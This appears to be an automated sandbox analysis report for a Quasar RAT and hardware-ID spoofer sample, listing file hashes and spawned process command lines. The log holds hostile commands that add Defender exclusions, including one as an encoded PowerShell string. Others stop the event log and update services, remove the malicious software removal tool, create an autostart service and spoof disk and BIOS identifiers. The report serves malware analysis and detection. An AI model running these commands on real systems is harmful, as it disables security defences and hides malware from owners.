| SHA512 | bfcc9685b365bac78d0336378d15b7d4f35d486b0791f202654985bcc23076255db8739cbcd759a4e4ec92c79b07f299e9f76ed3daf8e3aa3722e4c236164248 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | c4d09d3b3516550ad2ded3b09e28c10c |
| SHA1 | 7a5e77bb9ba74cf57cb1d119325b0b7f64199824 |
| SHA256 | 66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3 |
| SHA512 | 2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 3813c096abb967e2049b3a17aad38c79 |
| SHA1 | 18832c7140fa91fc42f53807e6d93f2baad99fb3 |
| SHA256 | 32f456c7b689427b08292b3eb4096b1a227dfd141fa1db72845e96325273defe |
| SHA512 | 74e76a1dd8bc1bced1804124a8cec91ed4fc8933d413354f87dfe0e917e47cc9d9ee13e1fc8bc18aa2f7bb409a905a04b18330c482375941cb344566eae13566 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | c76bf9d5f7869a76d99e3563483f42a9 |
| SHA1 | c61858528025fd9b2f18edf82fb79c653d9eb08c |
| SHA256 | 072597551e86b812296386ae85aecc5745a41e9f3086660c057a5b3b63fc72b4 |
| SHA512 | 6a8ff0ad0bf5bcc7379d9743847fbab0e9d54da7820358140e9da7bfc78dd0a968f74930821b6219d919ba82db176492c70d73aad9d02ac2683f349768c09313 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 3536cb75a2dc14e6e4e0df19b971050f |
| SHA1 | 29ec8af7477a561d0f9f5adbca3a4849c7462ab7 |
| SHA256 | 503dbf6e21931592d40e616be063dcec418fc895efd9d426da13b8816e5b9837 |
| SHA512 | e3b4faf17b13da2ec6c734613c217a7b228a82c3d1f7097237374cbdf1d056d04dfcf86d8a28bea25e1ba46bcee8c728a2a8b470ac3e7cfe0f1b17f899d5255b |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 29f70c075d729032371617d5e05b423b |
| SHA1 | ce61cdc8e53b6508989bb921ea02931e7e7c37f2 |
| SHA256 | eaf222bdc022de2365bcde21a7c7c6f8b23fe8daf9ab49a1352b95e55311c69f |
| SHA512 | b91a97bdfc0d288c058b6b6f7a9c5027ab0bdd316d998461603e6a49ef5d33e5a38dc7017fb47ed9b65c2dae3b403565734ad6493e25e0ea76347ffa2b8211ff |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | e7e95a816878c8c8abda3c6875fd2be0 |
| SHA1 | c8df4f696bcd9ca5bcebe2613516094c4c65bd9d |
| SHA256 | f66f332ce778ec2ce95dedb718a211ac049543601ca31dc5d9c0644bd6c823e3 |
| SHA512 | 47b0b4745fc16e22fc81d89916f17487d61c4920fe5409679785cc29914f03396d31d2a8269ce4cad930fbaab7f360a882c5ab1af4da283f3405503aff5461ca |
C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\HpsrSpoof.exe
| MD5 | 6af14c88c3b2b6ba40c6310744d6ff3a |
| SHA1 | e75f7acd982ec3bb9d98d4d0075021fd3fcbeb29 |
| SHA256 | 98202badb402073b1b113d1996e8ca800aeb8025fee52f3af4511a108d9a9ea9 |
| SHA512 | 53494652b2499ffab255f81628746fe276d9f955b567f43a999effa45a0b268d648ea781b218f45caebc7ebd8a6b7ed257c9adc0397f439ff25741cc31ce4427 |
C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\HpsrSpoof.exe
| MD5 | d945701ec9cf32a97a1e55dcf550116a |
| SHA1 | 0e39de5cf3a7a77c5a3f139a755e194791979bbe |
| SHA256 | 3693761116e5c5237ba39ce6ae08030e2589c1fc0bdaebeb1bf2fb6cc9d8d9b4 |
| SHA512 | 7ee09e91d60896c99540b5c79b5b89cad0c58e0ec7aca14b264e3385d05b8d658ec642ce6fa591697b7383d8f345794af70bca7989fe807ae2d2e3c2b85717a8 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 3d2339bb46b6446ca2e2204fda992d46 |
| SHA1 | 567794501e3c95086ceb0d11b4724fcc9a96531e |
| SHA256 | d8ec671390778fadbc9cc13bca8167f59ced2a3160a22ae8033dfa0dba052aaa |
| SHA512 | 751b40b03861ca8fbb48f56e4cc0bd9accaced9a584493a54a2e203853477a33cb5d04be735d9b9bf5472316992ade499e6ac22b7756a625ab625045209467a8 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 53cd016719269a49084e13a16acc4c84 |
| SHA1 | edb05c3a3e01233d78f3f16b0a51577eaf65f56d |
| SHA256 | 0901bf4589148381b7c0386e0683d2917434db4f187467026f58112ec1eeea58 |
| SHA512 | c37e75210ea57caa2dcd3d50da2f34b2620c42841c24eaa456d026c0766d0fa96de1d1234c3038d3a94d8ac30d37b1e9bdb523f584073f461ffa4eb0d1e90774 |
\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | e9381caa40a3c97ed6a61c4b77ffc94d |
| SHA1 | e4c996070e2e3c7cb74bec5fab97258fd0663a8e |
| SHA256 | 82b12e32e935539f0eb53717e77047824d3ebe41e6b7c009077b368a234248f9 |
| SHA512 | 4209ed1f5a167340cd47f9ed5e303644ffa9b89f99034a933964defda4cc93a3e9f7f6a679617000932511d599a5ab6dae57458013500e4e898c98324868cfbc |
memory/2516-288-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2516-287-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2516-286-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2516-285-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2516-284-0x0000000140000000-0x000000014000E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar5C48.tmp
| MD5 | beb854cd18937e58bec88d4b5a2884f6 |
| SHA1 | 14e892998e0111b0ebdf46d1405d0f0ad5bd3847 |
| SHA256 | 16d6f4ace4b5da97fd8d72fb80cea668d4a3bde0c0c250684fbb4248d6513b8f |
| SHA512 | 8e8b031484e97e54e2eae4553ad3b96587e594f1e0e84938027edaaa23b1d975382669e46e4b0be52dff649e4e410432174076340ef7dba93b23388260971f48 |
C:\Users\Admin\AppData\Local\Temp\Cab5C45.tmp
| MD5 | 0f7dd05e4f2e78d9509eff91d584018d |
| SHA1 | c115bfacabf810f5c8723bdb11e65850c28babfa |
| SHA256 | 217f835eeb669f657d92ca4187f083ae7789f901041be36e24a72e72c73e8fe3 |
| SHA512 | 3b41dcf509543920b4e3e8f260ff072e126ed2cb28892449a170ce3e22727370ca3a7f26803ee3c0a21a39eea0268deb02ca78ffa5e2fc51434aa78a0d99323c |
\ProgramData\VC_redist.x64.exe
| MD5 | 4d6fa9ceb316e626dfd9392c4e87db6f |
| SHA1 | b8ba4a2139fddc4f10b056239cdc78a19eaf5e4e |
| SHA256 | 7dc9aa59147a27bbd89310471637383c86d46007009d11de7ec65cfa515b2b8c |
| SHA512 | 463978c9e98bb4ce842b12352dd4868e9c28d380e7dbb9c6231403693a22b874d8515a49e82a5e82a3315dcca85b0aa088d00842ee23ca0e7f1ec6ac3186228f |
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
| MD5 | 83e9af36fc52bec3b1fb00c096805505 |
| SHA1 | cff52442e2dedb9878674382f009b47b39205954 |
| SHA256 | e88117088e8d563ed01a90aad6e6223f50dcb27b5105bbb65452f13be6d7290d |
| SHA512 | cdd46c64233691c711b34c5580fa4dbc0131a1a5001b7f1b46919a67d2bce6c2b2b1a7ada48a885c74db9c00394f634d4d00f3b690e044e9280097d94632ac9a |
memory/2516-321-0x0000000140000000-0x000000014000E000-memory.dmp
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
| MD5 | ee08fe3260c0fef3a5528627600ef93c |
| SHA1 | e5a4508681cd3b8947251965399461c95af74ca5 |
| SHA256 | a833599aacea3ec99d1fe18bdfe1c75971c62c9f046af1224a06627ffc69d251 |
| SHA512 | c7041b594ee93f7d970bd50f28d21bf91f9dc6712cd2915678c3022a60178126dc2c2c6444fc7c6c4025f45916995e69ea7f55a8ca080775a0e64413efcb2ca7 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-30 01:01
Reported
2023-12-30 01:04
Platform
win10v2004-20231215-en
Max time kernel
7s
Max time network
160s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Stops running service(s)
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe
"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: UGTJ-CJFG
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: UGTJ-CJFG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 11428HP-TRGT32649AB
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 211438HP-TRGT32127RV
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 811438HP-TRGT32127SG
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 511451HP-TRGT9584SL
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 311451HP-TRGT9584DQ
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 711451HP-TRGT9584MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 611451HP-TRGT9584FU
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 411451HP-TRGT9584FA
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 711474HP-TRGT19287MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 811474HP-TRGT19287SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 411474HP-TRGT19287FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 11474HP-TRGT19287AB
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 211474HP-TRGT19287RV
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 611474HP-TRGT19287FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 311474HP-TRGT19287DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 511474HP-TRGT19287SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 211487HP-TRGT29513RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 611487HP-TRGT29513FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 311487HP-TRGT29513DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 711487HP-TRGT29513MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 411487HP-TRGT29513FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 511487HP-TRGT29513SL
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 811487HP-TRGT29513SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 11487HP-TRGT29513AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: DG9V-VBK4
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: DG9V-VBK4
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "driverupdate"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: GKG6-S32N
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: GKG6-S32N
C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "driverupdate"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 3JDB-PKZ5
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 3JDB-PKZ5
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BF3G-2PBI
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BF3G-2PBI
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: H8FR-4C04
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: H8FR-4C04
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: FS42-79ML
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: FS42-79ML
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 9C05-AHUC
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 9C05-AHUC
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
